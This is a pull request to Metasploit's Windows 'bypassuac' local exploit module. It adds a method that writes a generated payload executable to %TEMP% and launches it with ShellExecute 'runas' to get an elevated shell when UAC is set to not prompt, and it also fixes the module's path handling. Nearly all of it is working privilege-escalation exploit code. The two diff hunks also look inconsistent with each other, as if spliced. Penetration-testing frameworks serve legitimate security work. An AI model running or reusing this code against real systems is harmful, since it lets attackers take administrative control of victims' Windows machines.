### PR TITLE
Modify BypassUAC to auto-use ask functionality

### DIFF
--- a/modules/exploits/windows/local/bypassuac.rb
+++ b/modules/exploits/windows/local/bypassuac.rb
@@ -44,8 +44,13 @@ class Metasploit3 < Msf::Exploit::Local
     payload = generate_payload_exe
     payload_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
     tmpdir = session.fs.file.expand_path("%TEMP%")
-    session.fs.file.upload_file("#{tmpdir}\\#{payload_filename}", payload)
-    session.railgun.shell32.ShellExecuteA(nil,"runas",cmd_location,nil,nil,5)
+    tempexe = tmpdir + "\\" + payload_filename
+    fd = session.fs.file.new(tempexe, "wb")
+    fd.write(payload)
+    fd.close
+    print_status("Uploading payload: #{tmpdir}\\#{payload_filename}")
+    session.railgun.shell32.ShellExecuteA(nil,"runas","#{tmpdir}\\#{payload_filename}",nil,nil,5)
+    print_status("Payload executed")
   end
 
   def exploit

--- a/modules/exploits/windows/local/bypassuac.rb
+++ b/modules/exploits/windows/local/bypassuac.rb
@@ -40,6 +40,14 @@ class Metasploit3 < Msf::Exploit::Local
 
   end
 
+  def runas_method
+    payload = generate_payload_exe
+    payload_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
+    tmpdir = session.fs.file.expand_path("%TEMP%")
+    session.fs.file.upload_file("#{tmpdir}\\#{payload_filename}", payload)
+    session.railgun.shell32.ShellExecuteA(nil,"runas",cmd_location,nil,nil,5)
+  end
+
   def exploit
 
     isadmin = session.railgun.shell32.IsUserAnAdmin()
@@ -81,7 +89,9 @@ class Metasploit3 < Msf::Exploit::Local
       print_good "UAC is set to Default"
       print_good "BypassUAC can bypass this setting, continuing..."
     when 0
-      print_warning "Could not determine UAC level - attempting anyways..."
+      print_warning "UAC set to DoNotPrompt - using ShellExecute 'runas' method instead"
+      runas_method
+      return
     end
 
     # Check if you are an admin
@@ -132,7 +142,7 @@ class Metasploit3 < Msf::Exploit::Local
     end
 
     tmpdir = session.fs.file.expand_path("%TEMP%")
-    cmd = "#{tmpdir}\\#{bypass_uac_filename} /c %TEMP%\\#{payload_filename}"
+    cmd = "#{tmpdir}\\#{bypass_uac_filename} /c #{tmpdir}\\#{payload_filename}"
 
     print_status("Uploading the bypass UAC executable to the filesystem...")
 
@@ -140,7 +150,7 @@ class Metasploit3 < Msf::Exploit::Local
       #
       # Upload UAC bypass to the filesystem
       #
-      session.fs.file.upload_file("%TEMP%\\#{bypass_uac_filename}", bpexe)
+      session.fs.file.upload_file("#{tmpdir}\\#{bypass_uac_filename}", bpexe)
       print_status("Meterpreter stager executable #{payload.length} bytes long being uploaded..")
       #
       # Upload the payload to the filesystem


### PR DESCRIPTION
Instead of just continuing to use the BypassUAC binaries when UAC is set to NoPrompt this will just use ShellExecute's 'runas' function which in this scenario won't prompt the user and will just result in a elevated shell with only needing to drop the single executable.
